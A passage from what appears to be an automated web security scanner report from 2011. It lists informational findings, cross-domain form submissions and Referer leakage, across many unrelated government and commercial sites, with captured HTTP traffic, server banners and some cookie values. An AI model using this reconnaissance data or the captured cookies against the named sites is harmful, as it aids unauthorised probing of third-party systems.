<td valign="top"> <form action="http://thomas.loc.gov/cgi-bin/query" method="post" name="loc-word"> <table border="0" cellpadding="0" cellspacing="0" width="100%">
...[SNIP]...

11.17. http://tonko.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tonko.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: tonko.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 53922
Content-Type: text/html
Content-Location: http://tonko.house.gov/index.html
Last-Modified: Fri, 08 Jul 2011 14:47:30 GMT
Accept-Ranges: bytes
ETag: "cf40dcf67d3dcc1:1720a"
X-Powered-By: ASP.NET
Server: U. S. House of Representatives
Date: Wed, 13 Jul 2011 01:44:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Congressman Paul Ton
...[SNIP]...
</form> <form action="http://thomas.loc.gov/cgi-bin/query" method="post" name="loc-number"> <table border="0" cellpadding="0" cellspacing="0" width="100%">
...[SNIP]...

11.18. http://www.buckthebuckleupdog.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buckthebuckleupdog.org
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.accountsupport.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.buckthebuckleupdog.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:21 GMT
Content-Type: text/html
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Sun, 31 Jan 2010 21:17:06 GMT
ETag: "6083e17-404e-47e7c6409b028"
Accept-Ranges: bytes
Content-Length: 16462
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!--Start Sign Guest Book Code-->

<form action="http://www.accountsupport.com/plugin/Guestbook.bml" method="post" target='mywindow' onSubmit="window.open('about:blank','mywindow', 'toolbar=no,location=no,directories=no,status=no, menubar=no, scrollbars=yes,resizable=yes,copyhistory=no,width=500,height=350')"> <input type='hidden' name='account' value='as.bucktheb'/>
...[SNIP]...

11.19. http://www.dos.state.ny.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dos.state.ny.us
Path:   /

Issue detail

The page contains a form which POSTs data to the domain appext9.dos.ny.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.dos.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 29096
Content-Type: text/html
Content-Location: http://www.dos.state.ny.us/index.html
Last-Modified: Fri, 08 Jul 2011 13:42:25 GMT
Accept-Ranges: bytes
ETag: "ef9119df743dcc1:4a3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:51:29 GMT
Connection: close

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New York State Department of State</title>

<link href="css/nav02.css" rel="stylesheet" t
...[SNIP]...
<div id="searchdos2" style="float:right; height:25px; padding: 0px 3px 0px 0px;">
<form action="http://appext9.dos.ny.gov/corp_public/CORPSEARCH.SELECT_ENTITY" method="post" target="_blank" >
<label for="p_entity_name">
...[SNIP]...

11.20. http://www.gnu.org/licenses/gpl.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /licenses/gpl.html

Issue detail

The page contains a form which POSTs data to the domain crm.fsf.org. The form contains the following fields:

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:32 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Wed, 13 Jul 2011 01:51:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
</p>
    <form action="https://crm.fsf.org/civicrm/profile/create&amp;reset=1&amp;gid=31" method="post">
<div>
...[SNIP]...

11.21. http://www.louise.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.louise.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain email.address-verify.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.louise.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:57 GMT
Server: Apache
Set-Cookie: ce12a43d31101321362cf131b5cb4bf5=2m8kqb9hvsqs9ciisr3ds8m881; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:50:58 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 65651
Connection: close
Content-Type: text/html; charset=utf-8


<!doctype html>

<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" clas
...[SNIP]...
<div class="sidebox signup"><form method="post" action="http://email.address-verify.com/q/akH76aYza6IKDdV55kCsXUtGxZ7tKYSiUl">
<input type="hidden" name="crvs" value="l92odHaE0CIoOP-ArUPEW1b9CI4Dqy2lBJRB3uASUpBF3sj0ungQ4LB5Cboe43Uq0NmYUUPyghPlOMjBfeRXBS1ry-B64RxltkJ3tbeE0OEabeDOJIiYDzmXXDLlIu0p5sgAEcfChOl1xesNzlWaT-BfPGQlVfJ
...[SNIP]...

11.22. http://www.nj.gov/nj/includes/scripts/common_functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nj.gov
Path:   /nj/includes/scripts/common_functions.js

Issue detail

The page contains a form which POSTs data to the domain search.state.nj.us. The form contains the following fields:

Request

GET /nj/includes/scripts/common_functions.js HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:56 GMT
Content-length: 4769
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>

...[SNIP]...
<td width="593" height="90" align="right" valign="top">
<form action="http://search.state.nj.us/query.html" method="post" name="seek" id="seek" >
<table width="100%" border="0" align="right" cellpadding="0" cellspacing="0" class="search">
...[SNIP]...

11.23. http://www.nj.gov/nj/includes/scripts/custom_functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nj.gov
Path:   /nj/includes/scripts/custom_functions.js

Issue detail

The page contains a form which POSTs data to the domain search.state.nj.us. The form contains the following fields:

Request

GET /nj/includes/scripts/custom_functions.js HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:56 GMT
Content-length: 4769
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>

...[SNIP]...
<td width="593" height="90" align="right" valign="top">
<form action="http://search.state.nj.us/query.html" method="post" name="seek" id="seek" >
<table width="100%" border="0" align="right" cellpadding="0" cellspacing="0" class="search">
...[SNIP]...

11.24. http://www.state.nj.us/patentbank/feedback/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /patentbank/feedback/

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /patentbank/feedback/ HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:30 GMT
Content-length: 15387
Content-type: text/html
Last-modified: Wed, 26 Aug 2009 15:21:55 GMT
Etag: "3c1b-4a955313"
Accept-ranges: bytes
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN
...[SNIP]...
<!-- -->
<form action="https://www.salesforce.com/servlet/servlet.WebToCase?encoding=UTF-8" method="post" onSubmit="return verify_email();" name="web2case_form" id="web2case_form">
<input type=hidden name="orgid" value="00D30000000JiZZ">
...[SNIP]...

12. Cross-domain Referer leakage  previous  next
There are 26 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


12.1. http://ads.doclix.com/adserver/serve/js/pop_under_unit.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/serve/js/pop_under_unit.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adserver/serve/js/pop_under_unit.jsp?pid=16609&codeId=3794&refUrl=http%3A//soris.us/&ref= HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://soris.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:41:28 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ad_served=cG9wX3VuZGVy; Domain=.doclix.com; Expires=Sat, 23-Jul-2011 11:41:28 GMT; Path=/
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 17041
Connection: close

<!DOCTYPE HTML>
<html>
       <head>
                       
           <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
           <title>AdSide: Sponsored Links</title>
           <script src="doclix_lib.js" type="tex
...[SNIP]...
<div id="doclix_ad_unit">
<a id="adside_call" href="http://www.adside.com" target="_blank">Sponsored Links</a>
...[SNIP]...

12.2. http://climate.rutgers.edu/njwxnet/station.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://climate.rutgers.edu
Path:   /njwxnet/station.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /njwxnet/station.php?s=58 HTTP/1.1
Host: climate.rutgers.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16947


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>Trenton, NJ - Forecast, Radar and Current Weather - NJWxnet</title>
   <link rel="styles
...[SNIP]...
<li><a href="http://www.erh.noaa.gov/er/phi/" target="_blank">NWS NJ Forecast</a>
...[SNIP]...
<li><a href="http://weather.gov" target="_blank">NWS US Forecast</a>
...[SNIP]...
<a href="mapviewer.php?m=temperature&t=cur"><img src="http://128.6.226.99/~njwxnet/maps/thumbnails/njwxnet-temperature_thumb.jpg">Latest Temperatures</a>
...[SNIP]...
<a href="mapviewer.php?m=radar&t=cur"><img src="http://128.6.226.99/~njwxnet/maps/thumbnails/njwxnet-radar_thumb.jpg">Latest Radar</a>
...[SNIP]...
<a href="mapviewer.php?m=satelliteIR&t=cur"><img src="http://128.6.226.99/~njwxnet/maps/thumbnails/njwxnet-satelliteIR_thumbnail.jpg">Latest IR Satellite</a>
...[SNIP]...
<img class="title" src="images/title_resourcelinks.png">
                       <a target='_new' class='resourceLink' href='http://groundwaterwatch.usgs.gov/AWLSites.asp?S=401804074432601'>Ground-water</a>
...[SNIP]...
</div><a target='_new' class='resourceLink' href='http://waterdata.usgs.gov/nj/nwis/nwisman/?site_no=01463500&agency_cd=USGS'>Streamflow</a>
...[SNIP]...
</div><a target='_new' class='resourceLink' href='http://www.state.nj.us/transportation/traffic/cameras/rt95/rt95_2.8.shtm'>Webcam</a>
...[SNIP]...
<div id="chart">
                           <img id="mainchart" src="http://128.6.226.99/~njwxnet/charts/midsize/tempdewp-58-midsize.jpg">
                       </div>
...[SNIP]...
<a href="javascript:swapChart('tempdewp-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/tempdewp-58-thumb.jpg'>24 Hour Temperature/Dewpt</a>
...[SNIP]...
<a href="javascript:swapChart('relhumid-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/relhumid-58-thumb.jpg'>Relative Humidity</a>
...[SNIP]...
<a href="javascript:swapChart('winds-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/winds-58-thumb.jpg'>24 Hour Winds</a>
...[SNIP]...
<a href="javascript:swapChart('pressure-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/pressure-58-thumb.jpg'>Barometric Pressure</a>
...[SNIP]...
<a href="javascript:swapChart('precip-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/precip-58-thumb.jpg'>Precipitation</a>
...[SNIP]...
<a href="javascript:swapChart('solarradiation1-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/solarradiation1-58-thumb.jpg'>Solar Radiation</a>
...[SNIP]...
<a href="javascript:swapChart('maxtemp-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/maxtemp-58-thumb.jpg'>30 Day Temperatures</a>
...[SNIP]...
<a href="javascript:swapChart('precip_totals-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/precip_totals-58-thumb.jpg'>90 Day Precip Totals</a>
...[SNIP]...
<a href="javascript:swapChart('precip_events-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/precip_events-58-thumb.jpg'>90 Day Precip Events</a>
...[SNIP]...
</div>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

12.3. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://egov.dnrec.delaware.gov
Path:   /egovpublic/dnrec/disp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /egovpublic/dnrec/disp?doc=LoginScreen&deptPath=public&op=showDefault&dept=5 HTTP/1.1
Host: egov.dnrec.delaware.gov
Connection: keep-alive
Referer: http://www.delaware.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1310522495650:ss=1310522357519

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:01:40 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 35610
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/REC-html40/loose.dtd">
<html lang="en-us">
<head>
<!-- CLFeGov v2.2 - 12/15/2004 -->
<m
...[SNIP]...
<td width="15%" align="left">

<script src=https://seal.verisign.com/getseal?host_name=egov.dnrec.delaware.gov&size=M&use_flash=NO&use_transparent=NO&lang=en></script>
...[SNIP]...

12.4. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /maps?file\u003dgoogleapi HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:15 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521935:S=34g7y1Dpote6i-Qu; expires=Fri, 12-Jul-2013 01:52:15 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?file%5Cu003dgoogleapi=&sa=N&hl=en&tab=l1">YouTube</a>
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img class="panel-bar-divider bar-divider" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </span>
...[SNIP]...
<a style="display:none" href="#" jsdisplay="topbar_config.show_lbc_badge" jsattrs="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span class="link-text">
...[SNIP]...
<a style="display:" jsattrs="style.display: topbar_config.show_panel_toggler?'':'none'" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img class="collapse-left3" title="Hide panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
jsattrs="style.display: topbar_config.show_return_arrow?'':'none'; href: topbar_config.show_return_arrow?topbar_config.return_arrow_url:'#'" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img class="collapse-left3" title="Map View" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"><img class="bar-icon view-as-kml" src="http://maps.gstatic.com/mapfiles/transparent.png"/><span class="link-text">
...[SNIP]...
</a> <img class="bar-icon-divider bar-divider" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </span> <a style="text-decoration:none" href="javascript:void(0);" jsaction="print.show" id="print"><img class="bar-icon bar-icon-print2" src="http://maps.gstatic.com/mapfiles/transparent.png"/> <span class="link-text">
...[SNIP]...
</a> <img class="bar-icon-divider bar-divider" src="http://maps.gstatic.com/mapfiles/transparent.png"/> <a style="text-decoration:none" id="showsendtox" href="javascript:void(0)" jsaction="stx.show"><img class="bar-icon bar-icon-email2" src="http://maps.gstatic.com/mapfiles/transparent.png"/> <span class="link-text">
...[SNIP]...
</a> <img class="bar-icon-divider bar-divider" src="http://maps.gstatic.com/mapfiles/transparent.png"/> <a style="text-decoration:none" href="javascript:void(0);" jsaction="link.show" id="link"><img class="bar-icon bar-icon-link2" src="http://maps.gstatic.com/mapfiles/transparent.png"/> <span class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div class="flmcpanup clickable" style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" id="zoom_out_inline_img" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" style="width:103px" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img class="mv-dropdown" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div class="dir-tm" style="visibility:" id="travel_modes_div"> <img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/><a jsfor="travelModes" jsattrs=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsattrs="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

12.5. https://market.android.com/details  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://market.android.com
Path:   /details

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /details?id=com.genwi.delaware HTTP/1.1
Host: market.android.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=2592000
Content-Type: text/html; charset=UTF-8
Date: Wed, 13 Jul 2011 02:00:10 GMT
Expires: Wed, 13 Jul 2011 02:00:10 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 44823

<!DOCTYPE html><!--
Content-type: Preventing MHTML XSS in IE.

--><html><head><script type="text/javascript">function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t
...[SNIP]...
</script><script src="https://checkout.google.com/customer/gadget/embeddedbuy.js?divId=checkout-root&copyrightFooterDivId=checkout-footer&hl=en_US&gl=US"></script>
...[SNIP]...
</script><script src="https://apis.google.com/js/plusone.js">{"lang": "en_US"}</script>
...[SNIP]...
</a> <a target=_blank href="https://mail.google.com/mail/" class=gb1>Gmail</a>
...[SNIP]...
</a> <a target=_blank href="https://www.google.com/calendar" class=gb2>Calendar</a> <a target=_blank href="https://picasaweb.google.com/home" class=gb2>Photos</a> <a target=_blank href="https://docs.google.com/" class=gb2>Documents</a> <a target=_blank href="https://www.google.com/reader/" class=gb2>Reader</a> <a target=_blank href="https://sites.google.com/" class=gb2>Sites</a>
...[SNIP]...
</span><a id="gb_70" href="https://www.google.com/accounts/ServiceLogin?service=androidmarket&amp;passive=86400&amp;continue=https://market.android.com/details?id%3Dcom.genwi.delaware&amp;followup=https://market.android.com/details?id%3Dcom.genwi.delaware" class=gb4>Sign in</a>
...[SNIP]...
<div class="doc-banner-icon"><img class="photo" src="https://ssl.gstatic.com/android/market/com.genwi.delaware/hi-512-11" /></div>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.mylocaltv.wtxf&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wtxf/hi-256-0-f4cf4ef7402b6a738ec737dfa630624b493b07ee"alt="MyFoxPhilly Fox29 News"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.mylottos.results&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/com.mylottos.results/hi-256-2-799e13fd1c5bf6ed872a7a88a6ce952a53234d2c"alt="Lotto Results"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=org.npr.android.news&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/org.npr.android.news/hi-512-8"alt="NPR News"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.foxnews.android&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/com.foxnews.android/hi-512-14"alt="FOX News"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<div class="badges-badge-icon-annotation-developer goog-inline-block"><img src="https://ssl.gstatic.com/android/market_images/badges/topdev_ann.png" title="Top Developer" /></div>
...[SNIP]...
<div class="carousel-page"><img src="https://ssl.gstatic.com/android/market/com.genwi.delaware/ss-320-0-11" class="doc-screenshot-img lightbox" title="Delaware" itemprop="screenshots" /><img src="https://ssl.gstatic.com/android/market/com.genwi.delaware/ss-320-1-11" class="doc-screenshot-img lightbox" title="Delaware" itemprop="screenshots" /></div>
...[SNIP]...

12.6. https://market.android.com/details  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://market.android.com
Path:   /details

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /details?id=com.avai.amp.pbn_delaware HTTP/1.1
Host: market.android.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=2592000
